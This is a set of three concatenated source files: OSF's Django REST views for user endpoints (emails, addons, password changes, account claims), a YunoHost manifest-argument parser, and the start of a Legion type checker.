self.check_object_permissions(self.request, obj)
return obj
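# Illustrative note (sketch, not in the original file): a view that mixes in
# UserMixin resolves users from the 'user_id' URL kwarg, which may be either
# the literal 'me' for the authenticated user or a user guid (the concrete URL
# shape, e.g. /v2/users/me/, is an assumption based on the linked API docs).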
class UserList(JSONAPIBaseView, generics.ListAPIView, ListFilterMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.RequiresScopedRequestOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.USERS_READ]
required_write_scopes = [CoreScopes.NULL]
model_class = apps.get_model('osf.OSFUser')
serializer_class = UserSerializer
ordering = ('-date_registered')
view_category = 'users'
view_name = 'user-list'
def get_default_queryset(self):
if self.request.version >= '2.3':
return OSFUser.objects.filter(is_registered=True, date_disabled__isnull=True, merged_by__isnull=True)
return OSFUser.objects.filter(is_registered=True, date_disabled__isnull=True)
# overrides ListCreateAPIView
def get_queryset(self):
return self.get_queryset_from_request()
class UserDetail(JSONAPIBaseView, generics.RetrieveUpdateAPIView, UserMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_read).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
ReadOnlyOrCurrentUser,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.USERS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE]
view_category = 'users'
view_name = 'user-detail'
serializer_class = UserDetailSerializer
parser_classes = (JSONAPIMultipleRelationshipsParser, JSONAPIMultipleRelationshipsParserForRegularJSON,)
def get_serializer_class(self):
if self.request.auth:
scopes = self.request.auth.attributes['accessTokenScope']
if (CoreScopes.USER_EMAIL_READ in normalize_scopes(scopes) and self.request.user == self.get_user()):
return ReadEmailUserDetailSerializer
return UserDetailSerializer
# overrides RetrieveAPIView
def get_object(self):
return self.get_user()
# overrides RetrieveUpdateAPIView
def get_serializer_context(self):
# Serializer needs the request in order to make an update to privacy
context = JSONAPIBaseView.get_serializer_context(self)
context['request'] = self.request
return context
class UserAddonList(JSONAPIBaseView, generics.ListAPIView, ListFilterMixin, UserMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_addons_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_ADDON_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = UserAddonSettingsSerializer
view_category = 'users'
view_name = 'user-addons'
ordering = ('-id',)
def get_queryset(self):
qs = [addon for addon in self.get_user().get_addons() if 'accounts' in addon.config.configs]
qs.sort()
return qs
class UserAddonDetail(JSONAPIBaseView, generics.RetrieveAPIView, UserMixin, AddonSettingsMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_addons_read).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_ADDON_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = UserAddonSettingsSerializer
view_category = 'users'
view_name = 'user-addon-detail'
def get_object(self):
return self.get_addon_settings(check_object_permissions=False)
class UserAddonAccountList(JSONAPIBaseView, generics.ListAPIView, UserMixin, AddonSettingsMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/Users_addon_accounts_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_ADDON_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = AddonAccountSerializer
view_category = 'users'
view_name = 'user-external_accounts'
ordering = ('-date_last_refreshed',)
def get_queryset(self):
return self.get_addon_settings(check_object_permissions=False).external_accounts
class UserAddonAccountDetail(JSONAPIBaseView, generics.RetrieveAPIView, UserMixin, AddonSettingsMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/Users_addon_accounts_read).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_ADDON_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = AddonAccountSerializer
view_category = 'users'
view_name = 'user-external_account-detail'
def get_object(self):
user_settings = self.get_addon_settings(check_object_permissions=False)
account_id = self.kwargs['account_id']
account = ExternalAccount.load(account_id)
if not (account and user_settings.external_accounts.filter(id=account.id).exists()):
raise NotFound('Requested addon unavailable')
return account
class UserNodes(JSONAPIBaseView, generics.ListAPIView, UserMixin, UserNodesFilterMixin, NodeOptimizationMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_nodes_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
model_class = AbstractNode
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.NODE_BASE_READ]
required_write_scopes = [CoreScopes.USERS_WRITE, CoreScopes.NODE_BASE_WRITE]
serializer_class = UserNodeSerializer
view_category = 'users'
view_name = 'user-nodes'
ordering = ('-last_logged',)
# overrides NodesFilterMixin
def get_default_queryset(self):
user = self.get_user()
# Nodes the requested user has read_permissions on
default_queryset = user.nodes_contributor_or_group_member_to
if user != self.request.user:
# Further restrict UserNodes to nodes the *requesting* user can view
return Node.objects.get_nodes_for_user(self.request.user, base_queryset=default_queryset, include_public=True)
return self.optimize_node_queryset(default_queryset)
# overrides ListAPIView
def get_queryset(self):
return (
self.get_queryset_from_request()
.select_related('node_license')
.include('contributor__user__guids', 'root__guids', limit_includes=10)
)
class UserGroups(JSONAPIBaseView, generics.ListAPIView, UserMixin, ListFilterMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.OSF_GROUPS_READ]
required_write_scopes = [CoreScopes.NULL]
model_class = apps.get_model('osf.OSFGroup')
serializer_class = GroupSerializer
view_category = 'users'
view_name = 'user-groups'
ordering = ('-modified', )
@require_flag(OSF_GROUPS)
def get_default_queryset(self):
requested_user = self.get_user()
current_user = self.request.user
if current_user.is_anonymous:
return OSFGroup.objects.none()
return requested_user.osf_groups.filter(id__in=current_user.osf_groups.values_list('id', flat=True))
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request()
class UserQuickFiles(JSONAPIBaseView, generics.ListAPIView, WaterButlerMixin, UserMixin, ListFilterMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
ordering = ('-last_touched')
required_read_scopes = [CoreScopes.USERS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE]
serializer_class = UserQuickFilesSerializer
view_category = 'users'
view_name = 'user-quickfiles'
def get_node(self, check_object_permissions):
return QuickFilesNode.objects.get_for_user(self.get_user(check_permissions=False))
def get_default_queryset(self):
self.kwargs[self.path_lookup_url_kwarg] = '/'
self.kwargs[self.provider_lookup_url_kwarg] = 'osfstorage'
files_list = self.fetch_from_waterbutler()
return files_list.children.prefetch_related('versions', 'tags').include('guids')
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request()
class UserPreprints(JSONAPIBaseView, generics.ListAPIView, UserMixin, PreprintFilterMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_preprints_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
ordering = ('-created')
model_class = AbstractNode
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.NODE_PREPRINTS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE, CoreScopes.NODE_PREPRINTS_WRITE]
serializer_class = PreprintSerializer
view_category = 'users'
view_name = 'user-preprints'
def get_default_queryset(self):
# the user who is requesting
auth = get_user_auth(self.request)
auth_user = getattr(auth, 'user', None)
# the user data being requested
target_user = self.get_user(check_permissions=False)
# Permissions on the list objects are handled by the query
default_qs = Preprint.objects.filter(_contributors__guids___id=target_user._id).exclude(machine_state='initial')
return self.preprints_queryset(default_qs, auth_user, allow_contribs=False)
def get_queryset(self):
return self.get_queryset_from_request()
class UserInstitutions(JSONAPIBaseView, generics.ListAPIView, UserMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_institutions_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.INSTITUTION_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = InstitutionSerializer
view_category = 'users'
view_name = 'user-institutions'
ordering = ('-pk', )
def get_default_odm_query(self):
return None
def get_queryset(self):
user = self.get_user()
return user.affiliated_institutions.all()
class UserRegistrations(JSONAPIBaseView, generics.ListAPIView, UserMixin, NodesFilterMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_registrations_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
model_class = Registration
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.NODE_REGISTRATIONS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE, CoreScopes.NODE_REGISTRATIONS_WRITE]
serializer_class = RegistrationSerializer
view_category = 'users'
view_name = 'user-registrations'
ordering = ('-modified',)
# overrides NodesFilterMixin
def get_default_queryset(self):
user = self.get_user()
current_user = self.request.user
qs = default_node_list_permission_queryset(user=current_user, model_cls=Registration)
# OSF group members not copied to registration. Only registration contributors need to be checked here.
return qs.filter(contributor__user__id=user.id)
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request().select_related('node_license').include('contributor__user__guids', 'root__guids', limit_includes=10)
class UserDraftRegistrations(JSONAPIBaseView, generics.ListAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticated,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.NODE_DRAFT_REGISTRATIONS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE, CoreScopes.NODE_DRAFT_REGISTRATIONS_WRITE]
serializer_class = DraftRegistrationSerializer
view_category = 'users'
view_name = 'user-draft-registrations'
ordering = ('-modified',)
def get_queryset(self):
user = self.get_user()
node_qs = Node.objects.get_nodes_for_user(user, permissions.ADMIN_NODE)
return DraftRegistration.objects.filter(
Q(registered_node__isnull=True) |
Q(registered_node__is_deleted=True),
branched_from__in=list(node_qs),
deleted__isnull=True,
)
class UserInstitutionsRelationship(JSONAPIBaseView, generics.RetrieveDestroyAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
ReadOnlyOrCurrentUserRelationship,
)
required_read_scopes = [CoreScopes.USERS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE]
serializer_class = UserInstitutionsRelationshipSerializer
parser_classes = (JSONAPIRelationshipParser, JSONAPIRelationshipParserForRegularJSON, )
view_category = 'users'
view_name = 'user-institutions-relationship'
def get_object(self):
user = self.get_user(check_permissions=False)
obj = {
'data': user.affiliated_institutions.all(),
'self': user,
}
self.check_object_permissions(self.request, obj)
return obj
def perform_destroy(self, instance):
data = self.request.data['data']
user = self.request.user
current_institutions = set(user.affiliated_institutions.values_list('_id', flat=True))
        # DELETEs normally don't get type-checked;
        # not the best way to do it, it should be enforced everywhere, maybe write a test for it
for val in data:
if val['type'] != get_meta_type(self.serializer_class, self.request):
raise Conflict()
for val in data:
if val['id'] in current_institutions:
user.remove_institution(val['id'])
user.save()
class UserIdentitiesList(JSONAPIBaseView, generics.ListAPIView, UserMixin):
"""
The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/external_identities_list).
"""
permission_classes = (
base_permissions.TokenHasScope,
drf_permissions.IsAuthenticatedOrReadOnly,
CurrentUser,
)
serializer_class = UserIdentitiesSerializer
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.NULL]
view_category = 'users'
view_name = 'user-identities-list'
# overrides ListAPIView
def get_queryset(self):
user = self.get_user()
identities = []
for key, value in user.external_identity.items():
identities.append({'_id': key, 'external_id': list(value.keys())[0], 'status': list(value.values())[0]})
return identities
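# Illustrative note (assumption inferred from the loop above): user.external_identity
# is expected to be a nested dict shaped roughly like
#   {'ORCID': {'0000-0001-2345-6789': 'VERIFIED'}}
# which this list view flattens into
#   {'_id': 'ORCID', 'external_id': '0000-0001-2345-6789', 'status': 'VERIFIED'}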
class UserIdentitiesDetail(JSONAPIBaseView, generics.RetrieveDestroyAPIView, UserMixin):
"""
The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/external_identities_detail).
"""
permission_classes = (
base_permissions.TokenHasScope,
drf_permissions.IsAuthenticatedOrReadOnly,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
serializer_class = UserIdentitiesSerializer
view_category = 'users'
view_name = 'user-identities-detail'
def get_object(self):
user = self.get_user()
identity_id = self.kwargs['identity_id']
try:
identity = user.external_identity[identity_id]
except KeyError:
raise NotFound('Requested external identity could not be found.')
        return {'_id': identity_id, 'external_id': list(identity.keys())[0], 'status': list(identity.values())[0]}
def perform_destroy(self, instance):
user = self.get_user()
identity_id = self.kwargs['identity_id']
try:
user.external_identity.pop(identity_id)
except KeyError:
raise NotFound('Requested external identity could not be found.')
user.save()
class UserAccountExport(JSONAPIBaseView, generics.CreateAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.NULL]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
view_category = 'users'
view_name = 'user-account-export'
serializer_class = UserAccountExportSerializer
throttle_classes = (SendEmailThrottle, )
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = self.get_user()
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.REQUEST_EXPORT,
user=user,
can_change_preferences=False,
)
user.email_last_sent = timezone.now()
user.save()
return Response(status=status.HTTP_204_NO_CONTENT)
class UserChangePassword(JSONAPIBaseView, generics.CreateAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.NULL]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
view_category = 'users'
view_name = 'user_password'
serializer_class = UserChangePasswordSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = self.get_user()
existing_password = request.data['existing_password']
new_password = request.data['new_password']
# It has been more than 1 hour since last invalid attempt to change password. Reset the counter for invalid attempts.
if throttle_period_expired(user.change_password_last_attempt, settings.TIME_RESET_CHANGE_PASSWORD_ATTEMPTS):
user.reset_old_password_invalid_attempts()
# There have been more than 3 failed attempts and throttle hasn't expired.
if user.old_password_invalid_attempts >= settings.INCORRECT_PASSWORD_ATTEMPTS_ALLOWED and not throttle_period_expired(
user.change_password_last_attempt, settings.CHANGE_PASSWORD_THROTTLE,
):
time_since_throttle = (timezone.now() - user.change_password_last_attempt.replace(tzinfo=pytz.utc)).total_seconds()
wait_time = settings.CHANGE_PASSWORD_THROTTLE - time_since_throttle
raise Throttled(wait=wait_time)
try:
# double new password for confirmation because validation is done on the front-end.
user.change_password(existing_password, new_password, new_password)
except ChangePasswordError as error:
# A response object must be returned instead of raising an exception to avoid rolling back the transaction
# and losing the incrementation of failed password attempts
user.save()
return JsonResponse(
{'errors': [{'detail': message} for message in error.messages]},
status=400,
content_type='application/vnd.api+json; application/json',
)
user.save()
remove_sessions_for_user(user)
return Response(status=status.HTTP_204_NO_CONTENT)
class UserSettings(JSONAPIBaseView, generics.RetrieveUpdateAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
throttle_classes = (SendEmailDeactivationThrottle, )
view_category = 'users'
view_name = 'user_settings'
serializer_class = UserSettingsSerializer
# overrides RetrieveUpdateAPIView
def get_serializer_class(self):
if self.request.method in ('PUT', 'PATCH'):
return UserSettingsUpdateSerializer
return UserSettingsSerializer
# overrides RetrieveUpdateAPIView
def get_object(self):
return self.get_user()
class ClaimUser(JSONAPIBaseView, generics.CreateAPIView, UserMixin):
permission_classes = (
base_permissions.TokenHasScope,
ClaimUserPermission,
)
required_read_scopes = [CoreScopes.NULL] # Tokens should not be able to access this
required_write_scopes = [CoreScopes.NULL] # Tokens should not be able to access this
view_category = 'users'
view_name = 'claim-user'
def _send_claim_email(self, *args, **kwargs):
""" This avoids needing to reimplement all of the logic in the sender methods.
When v1 is more fully deprecated, those send hooks should be reworked to not
rely upon a flask context and placed in utils (or elsewhere).
:param bool registered: Indicates which sender to call (passed in as keyword)
:param *args: Positional arguments passed to senders
:param **kwargs: Keyword arguments passed to senders
:return: None
"""
from website.app import app
from website.routes import make_url_map
try:
make_url_map(app)
except AssertionError:
# Already mapped
pass
ctx = app.test_request_context()
ctx.push()
if kwargs.pop('registered', False):
send_claim_registered_email(*args, **kwargs)
else:
send_claim_email(*args, **kwargs)
ctx.pop()
def post(self, request, *args, **kwargs):
claimer = request.user
email = (request.data.get('email', None) or '').lower().strip()
record_id = (request.data.get('id', None) or '').lower().strip()
if not record_id:
raise ValidationError('Must specify record "id".')
claimed_user = self.get_user(check_permissions=True) # Ensures claimability
if claimed_user.is_disabled:
raise ValidationError('Cannot claim disabled account.')
try:
record_referent = Guid.objects.get(_id=record_id).referent
except Guid.DoesNotExist:
raise NotFound('Unable to find specified record.')
try:
unclaimed_record = claimed_user.unclaimed_records[record_referent._id]
except KeyError:
if isinstance(record_referent, Preprint) and record_referent.node and record_referent.node._id in claimed_user.unclaimed_records:
record_referent = record_referent.node
unclaimed_record = claimed_user.unclaimed_records[record_referent._id]
else:
raise NotFound('Unable to find specified record.')
if claimer.is_anonymous and email:
claimer = get_user(email=email)
try:
if claimer and claimer.is_registered:
self._send_claim_email(claimer, claimed_user, record_referent, registered=True)
else:
self._send_claim_email(email, claimed_user, record_referent, notify=True, registered=False)
except HTTPError as e:
raise ValidationError(e.data['message_long'])
elif isinstance(claimer, OSFUser):
if unclaimed_record.get('referrer_id', '') == claimer._id:
raise ValidationError('Referrer cannot claim user.')
try:
self._send_claim_email(claimer, claimed_user, record_referent, registered=True)
except HTTPError as e:
raise ValidationError(e.data['message_long'])
else:
raise ValidationError('Must either be logged in or specify claim email.')
return Response(status=status.HTTP_204_NO_CONTENT)
class UserEmailsList(JSONAPIBaseView, generics.ListAPIView, generics.CreateAPIView, UserMixin, ListFilterMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
throttle_classes = (SendEmailThrottle, )
view_category = 'users'
view_name = 'user-emails'
serializer_class = UserEmailsSerializer
def get_default_queryset(self):
user = self.get_user()
serialized_emails = []
for email in user.emails.all():
primary = email.address == user.username
hashed_id = hashids.encode(email.id)
serialized_email = UserEmail(email_id=hashed_id, address=email.address, confirmed=True, verified=True, primary=primary)
serialized_emails.append(serialized_email)
email_verifications = user.email_verifications or {}
        for token, detail in email_verifications.items():
is_merge = Email.objects.filter(address=detail['email']).exists()
serialized_unconfirmed_email = UserEmail(
email_id=token,
address=detail['email'],
confirmed=detail['confirmed'],
verified=False,
primary=False,
is_merge=is_merge,
)
serialized_emails.append(serialized_unconfirmed_email)
return serialized_emails
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request()
class UserEmailsDetail(JSONAPIBaseView, generics.RetrieveUpdateDestroyAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
view_category = 'users'
view_name = 'user-email-detail'
serializer_class = UserEmailsSerializer
# Overrides RetrieveUpdateDestroyAPIView
def get_object(self):
email_id = self.kwargs['email_id']
user = self.get_user()
email = None
# check to see if it's a confirmed email with hashed id
decoded_id = hashids.decode(email_id)
if decoded_id:
try:
email = user.emails.get(id=decoded_id[0])
except Email.DoesNotExist:
email = None
else:
primary = email.address == user.username
address = email.address
confirmed = True
verified = True
is_merge = False
# check to see if it's an unconfirmed email with a token
elif user.unconfirmed_emails:
try:
email = user.email_verifications[email_id]
address = email['email']
confirmed = email['confirmed']
verified = False
primary = False
is_merge = Email.objects.filter(address=address).exists()
except KeyError:
email = None
if not email:
raise NotFound
# check for resend confirmation email query parameter in a GET request
if self.request.method == 'GET' and is_truthy(self.request.query_params.get('resend_confirmation')):
if not confirmed and settings.CONFIRM_REGISTRATIONS_BY_EMAIL:
if throttle_period_expired(user.email_last_sent, settings.SEND_EMAIL_THROTTLE):
send_confirm_email(user, email=address, renew=True)
user.email_last_sent = timezone.now()
user.save()
return UserEmail(email_id=email_id, address=address, confirmed=confirmed, verified=verified, primary=primary, is_merge=is_merge)
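    # Illustrative note: the email_id handled above takes one of two forms, a
    # hashids-encoded primary key for confirmed Email rows, or the raw
    # verification token for addresses that are still pending confirmation.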
def get(self, request, *args, **kwargs):
response = super(UserEmailsDetail, self).get(request, *args, **kwargs)
if is_truthy(self.request.query_params.get('resend_confirmation')):
user = self.get_user()
email_id = kwargs.get('email_id')
if user.unconfirmed_emails and user.email_verifications.get(email_id):
response.status = response.status_code = status.HTTP_202_ACCEPTED
return response
# Overrides RetrieveUpdateDestroyAPIView
def perform_destroy(self, instance):
user = self.get_user()
email = instance.address
if instance.confirmed and instance.verified:
try:
user.remove_email(email)
except PermissionsError as e:
raise ValidationError(e.args[0])
else:
user.remove_unconfirmed_email(email)
user.save()
| mattclark/osf.io | api/users/views.py | Python | apache-2.0 | 35,356 |
#!/usr/bin/python3
import sys
import json
def argument_for_question(question, all_choices=False):
question_type = question.get("type")
if question_type is None and question.get("choices"):
question_type = "boolean"
elif question_type in [None, "string"] and question.get("default"):
question_type = "with_default"
elif question_type is None and question["name"] == "admin":
question_type = "user"
elif question_type is None and question["name"] == "domain":
question_type = "domain"
if question_type == "domain":
return (question["name"], "ynh.local")
elif question_type == "path":
if all_choices:
return (question["name"], question["default"], "/")
else:
return (question["name"], question["default"])
elif question_type == "with_default":
return (question["name"], question["default"])
elif question_type == "boolean":
if not all_choices:
if isinstance(question["default"], bool):
if question["default"]:
question["default"] = "1"
else:
question["default"] = "0"
return (question["name"], question["default"])
else:
if isinstance(question["default"], bool) :
return (question["name"], "1", "0")
if question.get("choices"):
return (question["name"],) + tuple(question["choices"])
return (question["name"], question["default"])
elif question_type == "password":
return (question["name"], "ynh")
elif question_type == "user":
return (question["name"], "johndoe")
else:
raise Exception("Unknow question type: %s\n" % question_type, question)
if __name__ == '__main__':
manifest_path = sys.argv[1:][0]
manifest = json.load(open(manifest_path, "r"))
for question in manifest["arguments"]["install"]:
print(":".join(argument_for_question(question, all_choices=True)))
|
YunoHost/package_check
|
lib/manifest_parsing.py
|
Python
|
gpl-3.0
| 2,032
|
#!/usr/bin/env python
# Copyright 2014 Stanford University and Los Alamos National Security, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###
### Type Checker
###
# Backport of singledispatch to Python 2.x.
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
# Workaround for OrderedDict missing in Python 2.6.
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from . import ast, types
from .clang import types as ctypes
def is_eq(t): return types.is_POD(t) or types.is_pointer(t)
def returns_same_type(*ts): return ts[0]
def returns_bool(*_ignored): return types.Bool()
unary_operator_table = {
'-': (types.is_numeric, returns_same_type),
'!': (types.is_bool, returns_bool),
'~': (types.is_integral, returns_same_type),
}
binary_operator_table = {
'*': (types.is_numeric, returns_same_type),
'/': (types.is_numeric, returns_same_type),
'%': (types.is_integral, returns_same_type),
'+': (types.is_numeric, returns_same_type),
'-': (types.is_numeric, returns_same_type),
'>>': (types.is_integral, returns_same_type),
'<<': (types.is_integral, returns_same_type),
'<': (types.is_numeric, returns_bool),
'<=': (types.is_numeric, returns_bool),
'>': (types.is_numeric, returns_bool),
'>=': (types.is_numeric, returns_bool),
'==': (is_eq, returns_bool),
'!=': (is_eq, returns_bool),
'&': (types.is_integral, returns_same_type),
'^': (types.is_integral, returns_same_type),
'|': (types.is_integral, returns_same_type),
'&&': (types.is_bool, returns_bool),
'||': (types.is_bool, returns_bool),
}
reduce_operator_table = {
'*': types.is_numeric,
'/': types.is_numeric,
'%': types.is_integral,
'+': types.is_numeric,
'-': types.is_numeric,
'>>': types.is_integral,
'<<': types.is_integral,
'&': types.is_integral,
'^': types.is_integral,
'|': types.is_integral,
}
# An 'around' method-combination wrapper, a la Common Lisp.
class DispatchAround:
def __init__(self, inner_fn, outer_fn):
self.inner_fn = inner_fn
self.outer_fn = outer_fn
def __call__(self, *args, **kwargs):
return self.outer_fn(self.inner_fn, *args, **kwargs)
def __getattr__(self, name):
return getattr(self.inner_fn, name)
def store_result_in_type_map(fn):
def helper(fn, node, cx):
node_type = fn(node, cx)
cx.type_map[node] = node_type
return node_type
return DispatchAround(fn, helper)
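# Illustrative sketch (not part of the original source): the decorator stack
# below composes as
#     type_check_node = store_result_in_type_map(singledispatch(type_check_node))
# so a call dispatches on the node's type via the wrapped singledispatch
# function (inner_fn) and the 'around' helper records the result, roughly:
#     def type_check_node(node, cx):
#         node_type = dispatch_on_node_type(node, cx)   # hypothetical name
#         cx.type_map[node] = node_type
#         return node_type
# DispatchAround.__getattr__ forwards attribute lookups (e.g. .register) to
# the wrapped singledispatch function, which is why @type_check_node.register
# below still works on the wrapper.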
@store_result_in_type_map
@singledispatch
def type_check_node(node, cx):
raise Exception('Type checking failed at %s' % node)
@type_check_node.register(ast.Program)
def _(node, cx):
cx = cx.new_global_scope()
def_types = type_check_node(node.definitions, cx)
return types.Program(def_types)
@type_check_node.register(ast.Definitions)
def _(node, cx):
def_types = []
for definition in node.definitions:
def_types.append(type_check_node(definition, cx))
return def_types
@type_check_node.register(ast.Import)
def _(node, cx):
module_type = ctypes.foreign_type(node.ast, cx.opts)
for foreign_name, foreign_type in module_type.def_types.iteritems():
cx.insert(node, foreign_name, foreign_type)
cx.foreign_types.append(foreign_type)
return module_type
@type_check_node.register(ast.Struct)
def _(node, cx):
original_cx = cx
cx = cx.new_struct_scope()
# Initially create empty struct type.
struct_name = type_check_node(node.name, cx)
param_types = [
cx.region_forest.add(
types.Region(param.name, types.RegionKind(None, None)))
for param in node.params.params]
region_types = [
cx.region_forest.add(
types.Region(region.name, types.RegionKind(None, None)))
for region in node.regions.regions]
struct_constraints = []
empty_field_map = OrderedDict()
struct_type = types.Struct(struct_name, param_types, region_types, struct_constraints, empty_field_map)
def_struct_type = types.Kind(type = struct_type)
# Insert the struct name into global scope.
original_cx.insert(node, struct_name, def_struct_type)
# Figure out the actual types for params and regions and
# insert them into struct scope.
for param, param_type in zip(node.params.params, param_types):
cx.insert(node, param.name, param_type)
param_type.kind = type_check_node(param.type, cx)
if not param_type.validate_regions():
raise types.TypeError(node, 'Region type is inconsistent with itself: %s' % param_type.pretty_kind())
for region, region_type in zip(node.regions.regions, region_types):
cx.insert(node, region.name, region_type)
region_type.kind = type_check_node(region.type, cx)
if not region_type.validate_regions():
raise types.TypeError(node, 'Region type is inconsistent with itself: %s' % region_type.pretty_kind())
struct_constraints = type_check_node(node.constraints, cx)
struct_type.constraints = struct_constraints
field_map = type_check_node(node.field_decls, cx)
struct_type.field_map = field_map
# Note: This simple check only works as long as mutual
# recursion is disallowed on structs.
for field_type in field_map.itervalues():
if field_type == struct_type:
raise types.TypeError(node, 'Struct may not contain itself')
return def_struct_type
@type_check_node.register(ast.StructName)
def _(node, cx):
return node.name
@type_check_node.register(ast.StructConstraints)
def _(node, cx):
return [type_check_node(constraint, cx) for constraint in node.constraints]
@type_check_node.register(ast.StructConstraint)
def _(node, cx):
lhs = type_check_node(node.lhs, cx)
rhs = type_check_node(node.rhs, cx)
if lhs.kind.contains_type != rhs.kind.contains_type:
raise types.TypeError(node, 'Type mismatch in region element types for constraint: %s and %s' % (
lhs.kind.contains_type, rhs.kind.contains_type))
constraint = types.Constraint(node.op, lhs, rhs)
return constraint
@type_check_node.register(ast.StructConstraintRegion)
def _(node, cx):
region_type = cx.lookup(node, node.name)
assert types.is_region(region_type)
return region_type
@type_check_node.register(ast.FieldDecls)
def _(node, cx):
return OrderedDict([
type_check_node(field_decl, cx)
for field_decl in node.field_decls])
@type_check_node.register(ast.FieldDecl)
def _(node, cx):
field_kind = type_check_node(node.field_type, cx)
return (node.name, field_kind.type)
@type_check_node.register(ast.Function)
def _(node, cx):
original_cx = cx
cx = cx.new_function_scope()
fn_name = type_check_node(node.name, cx)
param_types = type_check_node(node.params, cx)
cx.privileges = type_check_node(node.privileges, cx)
return_kind = type_check_node(node.return_type, cx)
